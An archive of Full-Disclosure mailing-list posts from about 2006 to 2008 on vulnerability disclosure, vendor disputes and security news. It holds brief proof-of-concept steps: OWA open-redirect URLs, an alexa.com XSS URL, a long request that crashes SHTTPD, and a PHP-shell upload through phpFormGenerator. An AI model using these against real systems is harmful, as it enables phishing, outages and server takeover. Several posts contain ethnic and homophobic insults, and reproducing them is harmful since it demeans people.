Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br]
Discovered and reported 3 years ago http://www.google.com/search?hl=enq=oaw+exploit+exploitlabs.com+ http://www.exploitlabs.com/files/advisories/EXPL-A-2005-001-owa.txt http://seclists.org/fulldisclosure/2005/Feb/0101.html http://forums.techarena.in/small-business-server/1006421.htm Microsoft Outlook Web Access owalogon.asp Redirection Weakness http://secunia.com/advisories/14144/ - Original Message - From: Davide Del Vecchio [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Sent: Friday, October 17, 2008 12:07 PM Subject: Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC7368br] Hi, I found and notified this vulnerability to Microsoft in date: Tue, 10 Apr 2007 15:40:13 +0200 You read exactly, April 2007, 1 year and 6 months ago. :( The Microsoft Security Response Center opened the case ID MSRC 7368br. The bug has never been patched since 1 year and 6 months. I asked time to time for updates but they always answered me that the bug had to be patched with the next Service Pack and they did not have any ETA. This SP has still to be released. They told me that if I released the vulnerability prior to the official patch, I could not be officially credited for that. I tought it was not a critical vuln, and so I waited. Too much (?). I am a bit sorry for Microsoft, I think they lost an other chance since now I feel a bit tricked. I am not sure if the next time I will wait so much and I am not sure if I will suggest to anyone to wait for the patch. I just hope Microsoft will credit me in the official patch. :( Below you can find the first mail I wrote to MS regarding the issue. Best regards, Davide Del Vecchio. From: Davide Del Vecchio [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Microsoft Outlook Web Access redir.asp Redirection Weakness Date: Tue, 10 Apr 2007 15:40:13 +0200 Hello, I found a weakness in Microsoft Outlook Web Access (OWA), which potentially can be exploited by malicious people to conduct phishing attacks. The weakness is caused due to a design error in the way OWA uses an unverified user supplied argument to redirect a user after successful authentication. This can e.g. be exploited by tricking a user into following a link from a HTML document to the trusted login page with a malicious url parameter. After successful authentication, the user will be redirected to the untrusted (fake) site. The affected product is: Microsoft Outlook Web Access ( OWA ) Windows 2003 Examples: https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com this will take the user to http://www.example.com when the login box is pressed. https://[owa-url]/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe prompts the user to download an executable or other file. The attacker can then have a page to capture the user / password and redirect back to the original login page or some other form of phishing attack. Note that this vulnerability is very similar to the one affecting owalogin.asp described here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0420 Best regards, Davide Del Vecchio. Martin Suess ha scritto: ... Timeline: - Vendor Status: MSRC tracking case closed Vendor Notified:March 31st 2008 Vendor Response:May 6th 2008 Advisory Release: October 15th 2008 Patch available:- (vulnerability not high priority) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cross site scripting issues in s9y(CVE-2008-1386, CVE-2008-1387)
SHUT THE FUCK UP! From: n3td3v [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
4. use xss to IFRAME or otherwise leverage a client exploit imho this is by far worse than any of the other vectors mentioned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
im so hurt now... you make me feel so small compared to your great worx MrReepass stfu kthnx - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 12, 2007 9:01 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
basically i am saying i could care less, it was years ago, and i certaintly do not care about your gay antics at security cons or on this or any other public forum... can you really not be any better than a worthless pile of gmail poop? or at least let everone see your great security worx... but i seriously doubt that will happen * kinda like n3td3v\s great security research / discoveries! ciao - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, December 13, 2007 10:43 AM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability so are you now admitting your vulnerability was worthless? On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote: im so hurt now... you make me feel so small compared to your great worx MrReepass stfu kthnx - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 12, 2007 9:01 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RIPA powers being used
- Original Message - From: James Rankin [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tuesday, November 20, 2007 3:46 AM Subject: [Full-disclosure] RIPA powers being used RIPA is finally being used to force people to hand over encryption keys... http://news.bbc.co.uk/1/hi/technology/7102180.stm omg wtf... In the event that there was doubt that a suspect did not possess a key, he said, it was up to the prosecution to demonstrate beyond a reasonable doubt that they could know the passphrase ever fat finger a password? ever forgot a password? ( I got a zip archive I protected and cant unlock due to the fact I forgot the passphrase ) looks like prosecuters and judges will now be ASSUMING guilt or innocence based on whaty they THINK MIGHT be true. ( if you created the passphrase you must know it ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IDS logs showing outgoing packets on port 80
Skype? - Original Message - From: Kelly Robinson [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Saturday, November 03, 2007 3:20 PM Subject: [Full-disclosure] IDS logs showing outgoing packets on port 80 In our IDS logs, I notice many outgoing packets coming from port 80 (HTTP). These packets are coming from client PCs. What may be happening? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySpace URL redirection
warning: will crash Internet Exploder. http://profile.myspace.com/index.cfm?fuseaction=cms.goto_i=176efaa7-1908-488e-aa3e-2565dcf843d6_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html redirection yes, crash no ( IE7 ) crash yes ( IE6 ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pdp architect, drraid, beastiality, and incest
Do you understand the concept of protecting people and corporations from total idiots trying to gain access to their systems?PDP just lets others know what he found,while the offending company is working on a fix,in a minimal way. If you were a true researcher,you should be able to find the same with the clues he provides.Yay for PDP not feeding script kiddies! dunno but every sec researcher I know in the private sector would never release any info without it being fully authorized by his / her employer. Possibly we will see these idiots looking for a new job soon? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] are the NetBIOS-like hacking days over? -wide open citrix services on critical domains
Netbios is quite fun over Hamachi Subject: Re: [Full-disclosure] are the NetBIOS-like hacking days over? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Testing DidTheyReadIt.com
Outlook Express blocks this by default, unless you click the show images dialog thingie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symantec Contact?
What's really Sad is that Symantec does not have an option for the general public (i.e. Independent Virus Researchers) to submit virus samples . You have to either A. Submit it through their product. B. Have a Corporate Support contract. Guess they don't want new samples. agree 100%, stupidity ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] intrusion kit
What I'm looking for is an intrusion kit, a ZIP file that contains common tools like: vnc, nmap, pwdump, ssh client, etc. That have all dependencies in the zip file, so I could do: unzip kit.zip cd nmap nmap -sS localhost cd .. cd vnc run-vnc-server i guess your so talented in breaking into boxen that you cant simply make your own SFX to do what you want. btw: i seriously doubt anyone will help you ( or you buy the ebay offered one LOL... have fun getting yourelf pwnt ) byez, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Turkish hackers bring down insurer's site
http://www.smh.com.au/news/web/turkish-hackers-bring-down-insurers-site/2007/07/20/118455284.html its a defacement so what? Done by Turkish skriptkidz, with kidiescriptz no less ( you can bet the pharm there was no data or customer information leaked... ) move along... ( nothing to see here ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Persistent XSS and CSRF and on networkappliance
For the love of god people can we stop with the hashing already? hmm... i like hash ( and cake ) can we have a Month of Hash Cakes? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
yeah, lets reply the more we can!!! I like cake. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo 0day ActiveX Webcam Exploit
cannot reproduce.. yahoo IM versions 6.0.0.1922 8.1.0.249 DCE2F8B1-A520-11D4-8FD0-00D0B7730277 ywcupl.dll versions 2.0.1.2 and 2.0.1.4 9D39223E-AE8E-11D4-8FD3-00D0B7730277 ywcvwr.dll versions 2.0.1.3 and 2.0.1.4 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Yahoo Webcam Exploits
Corrected and working: I am very sorry! Please check again Exploit #1 new versions: 9D39223E-AE8E-11D4-8FD3-00D0B7730277 success yahoo version 8.1.0.249 Exploit #2: no success ( black box in IE ) 1 for 2 come on danny!!! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Yahoo Webcam Exploits
Exploit #2: working now.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] alexa.com XSS
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E is there more to say? Thank you, The thumbnail image for scriptalert(alexa sucks)/script will be updated within 48 hours ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies
A crack commando lead by Gandhi (who showed up in boxing gloves and elastic pants) managed to destroy an Iranian building complex used to conduct Denial of Service attacks against str0ke's private IRC intelligence service. But how did he destroy the building is the real question? /str0ke Gandhi has been known to be secretly developing a bot intra transformation chromatifier, or BITCh, for short. This appears to actualy harness the power of teh bots DoS functions, via a fiber optic link to power a wave disruptor, being co developed by MI6. Digging further, reports are that an engineer by the aformentioned code name v3dt3n has been a major player in this. This is all the info I can find for now... hope it helps, M.Wood ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Spam is funny!
Anyone else seeing this trend? I'd be curious especially to see whether or not they're targeting folks in non-IT roles. For example, do we have any veterinarians on the list who get stock spam with subjects related to animal husbandry? yup, lots of odd topics, in particular they do appear to come from mailman lists where you have subscribed, I get spam subjects and body content from what appears to be recently discussed topics, although only security security lists. ( and yes, universaly they are penny stock dump spam ) mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Why Microsoft should make windows open source
M$ will never let us h4x0rz into their source (willingly) but I agree with you James, the open source paradigm has regularly outpaced M$ and many other large corporate software producers where it comes to addressing bugs, security holes, and in many cases feature requests. Who knows... mabey they will get smart. IMHO M$ should, and could, release an opensource OS. OpenWin , WindOS, call it whatever. Release a small basic win32 platform ( kernel / window / desktop / explorer ), that could leverage existing development tools, to allow the comunity to provide extensible applications that readily conform to existing, public API's. Provided with runtime libraries already available in todays applications, the underpinning would support existing win32 applications. Packaged with win32 / cygwin versions of POSIX tools, perl, php and python, it would be a very robust, basic OS. ( reactOS + freeDOS ? ) Ooops... I forgot... this is Micro$oft I was talking about ..what we need is another Linus Torvalds to build and release a newcode win32 compliant kernel / base that uses anyway, M.W ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Fuck you too. Larry Seltzer eWEEK.com Security Center Editor cool Ziff-Davis lets you curse online. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CA BrightStor ARCserve Backup Mediasvr.exevulnerability
If you discover a vulnerability in CA products, please report your findings to vuln at ca dot com, or utilize our Submit a Vulnerability form at http://www3.ca.com/securityadvisor/vulninfo/submit.aspx. Looks like a vuln is found once a week in C.A products esp in you Backup and Anti-Viri products. 3 are listed currently on your own page http://www3.ca.com/securityadvisor/vulninfo/ and um... http://www3.ca.com/securityadvisor/vulninfo/search.aspx?mode=tmcpst=computer%20associates; tired of seeing C.A. exploits!!! especially the corporate products, your clients must thank you for providing remote access in EVERY PROGRAM YOU RELEASE ( i know the blackhats do ) please delete these products from your catalog. m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Xbox live account stolen.
Here is my current update on the situation. http://www.digitalmunition.com/StolenUpdate.html It would seem to me that MS / Bungie could simply cross reference the pretexed accounts to the IP address logged in from, following the reporting of a compromised account. If it is a rather small group perpetrating this, and it appears to be, one would think investigators could track this fairly easily??? XBOX Live accounts are purchased, and have monetary value. I am sure once word got out that these pretexters were being arrested for theft, incidents would drop fairly rapidly... PH34R T3H XB0X P0L1C3 !!! my $0.02, m.w ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] shttpd long get request vuln ( retro )
see attatched retro advisory - EXPL-A-2006-005 exploitlabs.com Retro Advisory 002 - - SHTTPD - AFFECTED PRODUCTS = SHTTPD v1.34 http://shttpd.sourceforge.net/ OVERVIEW SHTTPD is a lightweight web server. The main design goals are the ease of use and the ability to embed. Ideal for personal use, web-based software demos (like PHP, Perl etc), quick file sharing. A care has been taken to make the code secure RETRO-RELEASE DATE: === Oct 10, 2005 Duplicate Release: Oct 06, 2006 by: sk0de http://secunia.com/advisories/22294/ DETAILS === SHTTPD is vulnerable to an overly long GET request. SOLUTION patch: Upgrade to v1.35 PROOF OF CONCEPT 1.start SHTTPD 2.send an overly long GET request http://[host]/Ax274 chars ( v1.27 - v1.30 ) http://[host]/Ax256 chars ( v1.34 ) v1.31-v1.33 untested 2a. PoC by Sk0de http://www.milw0rm.com/exploits/2482 CREDITS === sk0de - http://secunia.com/advisories/22294/ RETRO-CREDITS = This vulnerability was discovered and researched by Donnie Werner of Exploitlabs. At the original time of discovery and retro-release date, the author was not aware of any other advisories or research by 3rd parties. Donnie Werner [EMAIL PROTECTED] [EMAIL PROTECTED] -- web:http://exploitlabs.com http://exploitlabs.com/files/advisories/EXPL-A-2006-005-shttpd.txt___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Googling:Google Meta Bugs
well... there is always this for fun... if you feel the need to... http://www.google.com/search?hl=enlr=safe=offq=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80 dosvidanya, mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] non-tech: defcon and FD. :)
So, at defcon, one of the evenings, at one of the tables... several people sat. Some of them were decent and therefore shall remain nameless. When introductions were made, we realized that The others were: Morning_Wood, the bantown fa*ot spammer, and me. We have a picture together, morning, how about uploading it somewhere? http://exploitlabs.com/gadi-scares-me.jpg Morning_Wood was surprisingly a cool guy, as well... but I think he is a bit scared of me now that we met. :P what me scared???. LOL, your like a TEDDY BEAR! n3td3v spunked: Morning Wood's mother has just died, I don't think this is the time to poke fun... I could be wrong though ;) at least I had one that loved life until her unexpected and untimely death, unlike your mum that drinks and turns tricks for the construction blokes down the lane for a hit off the crack pipe... eh mate? now shove off wanker! mw ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo messenger serious bug
I have a private PoC for this now for a few months, it does work ( although the PoC is slightly different and only requires one msg string to be sent ). cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Debian Development Machine Gluck Hacked - UPDATE
Debian Development Machine Hacked http://lists.debian.org/debian-devel-announce/2006/07/msg3.html or http://www.zone-h.org/content/view/13853/31/ Confirmed hacked by: Linux Kernel PRCTL Core Dump Handling Privilege Escalation Vulnerability http://www.debian.org/News/2006/20060713 or http://www.zone-h.org/content/view/13853/31/ ( updated ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Debian Development Machine Gluck Hacked -UPDATE
David Taylor wrote: Curious why Secunia is rating this as 'less critical'. The way I see it, this exploit could be integrated into the other exploits for mambo, joomla, phpbb, etc. Also, all of us that have websites hosted on linux machines that have a vulnerable kernel could get root? I'm thinking 'highly critical'? considering the widespread use of that kernel, yes and yes, viable user=root exploit can be obtained from a web app vuln. ( hacking 101 here kids ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Debian Development Machine Gluck Hacked
Debian Development Machine Hacked http://lists.debian.org/debian-devel-announce/2006/07/msg3.html or http://www.zone-h.org/content/view/13853/31/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo IM spoofing
Describe the IM a little further. Receiving garbage in an IM message isn't new, and is commonly sent to everyone in a chat room via a chat-bot. The IM commonly contains URL hyperlinks to either a gambling site, or a porn site [webcam,dating,etc]. the person who sends you the IM is YOU ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 70 million computers are using Windows 98 rightnow
Windows 98 has no remote exploits, only client side attacks ( IE, OE, WMP and 3rd party apps ) ( try sticking a win98 box in a dmz or direct to the Internet... It wont get owned ). I dont think it is that huge of an issue that they are abandoning it's users. The impending abandonment of support for Win98 has been comming for at least 2 years http://www.microsoft.com/windows/lifecycle/default.mspx http://www.internetnews.com/dev-news/article.php/3298741 As a matter of fact I have a Win98 box just for a game ( Descent2 on 3dfx !!! ) and my TV tuner. Replace IE and OE with open source replacements, and the platform could be a low cost alternative that would also carry a fair degree of security for those that would like to deploy it. One suggestion to Microsoft would be to make Win98 ( and Dos 6.2x ) available as a freeware OS since they will no longer be burdened by support, patches and etc anyway. Replace IE and OE with open source replacements, and the platform could be a low cost alternative that would also carry a fair degree of security for those that would like to deploy it. They could even open up some source code that is not used by the currently supported OS's, that could bring a good deal of support and development by the community. my2bits, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpFormGenerator
- EXPL-A-2006-004 exploitlabs.com Advisory 049 - - phpFormGenerator - AFFECTED PRODUCTS = phpFormGenerator v2.09 http://phpformgen.sourceforge.net/ OVERVIEW phpFormGenerator is an easy-to-use tool to create reliable and efficient web forms in a snap. No programming of any sort is required. Just follow along the phpFormGenerator wizard and at the end, you will have a fully functional web form! note: as stated by the vendor this script is widely used with cPanel and other hosting provider solutions. DETAILS === phpFormGenerator by default installs all directories as chmod 777 and will not function if they are not set as such. in the readme: 3. Set read+write+execute file permissions on the 'forms' directory and *everything* inside it (including all subdirectories and files) UNIX: chmod -R 777 forms in process2.php: please make sure that the forms directory (and everything in it) has read+write access. you can achieve this by issuing the following command on linux/unix: chmod -R 777 forms researcher note: when the applications directories are not set 777 the app errors with: File and Directory permissions The forms directory is not writeable. The forms/admin directory is not writeable. The use directory is not writeable. Please give read+write permissions to all the files and directories mentioned above. Refresh this page after you have done so. SOLUTION vendor contact: Musawir Ali [EMAIL PROTECTED] June 30, 2006 patch: none ( see vendor response ) VENDOR RESPONSE === there are no security flaws ... if you had taken a moment to think, you would realize that a a major software company such as cPanel would not be shipping phpFormGenerator with their scripts if it had flaws. In any case, the program has been thoroughly tested by myself and other security experts and is not known to have any issues. 777 is never forced, the suggested method is to give write permissions to the group the process belongs to. upload function is insecure. arbitrary php functions are insecure... could you be any more vague? You seem to be one of those ignorant nuts who shout slogans like windows sucks linux owns your server is insecure without realizing the garbage spooling out of your mouth. you're wasting my time. btw.. just so that you know, i have been on openbsd's development team, written the opengl kit for the openbeos OS project (now Haiku), and am an official GNU maintainer: http://www.gnu.org/people/people.html (search for my name) ... what you should be doing is thinking about how contributing to the opensource community and not being a bitch. PROOF OF CONCEPT 1.browse to the default install directory 2.create new form with the file upload function 3.complete the form using Insert data to MySQL database table? = no 4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html; 5.upload phpshell type of script 6.if you supplied an email address, the link will be sent to you http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php CREDITS === This vulnerability was discovered and researched by Donnie Werner of exploitlabs Donnie Werner Information Security Specialist [EMAIL PROTECTED] [EMAIL PROTECTED] -- web: http://exploitlabs.com http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Mostsites have vulnerabilities
What I am worried about for the moment is milw0rm. That site releases an average of 6 or 7 zero day exploits a day. It has increased the workload I have letting our IT folks know about new threats. A lot of these vulnerabilities are web/php based but pwn3d is pwn3d. if you had a clue you would realize that the majority ( my guess is 98% ) of the exploits on Millw0rm are not 0day, but are in fact released after vendor patches are available. ( mabey str0ke could help with his guess on the percentage ) for those that are released without vendor patches, they are generally due to the fact the the vendor is: 1. not contactable 2. non responsive to the researcher 3. ignorant in cases 2 and 3 ( common ) the researcher releases them to HELP bring the awareness to the vendor and users that foobar software is buggy and need be either fixed by the vendor or removed by users and replaced by a better solution. I suppose you would rather these float around only in the underground and then you would have NO clue as to how you got pwn3d, possibly you should have gotten into the offensive security side of things so you dont have to worry instead of going for the classic defensive security position you obviously dread. clue up! MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Mostsites have vulnerabilities
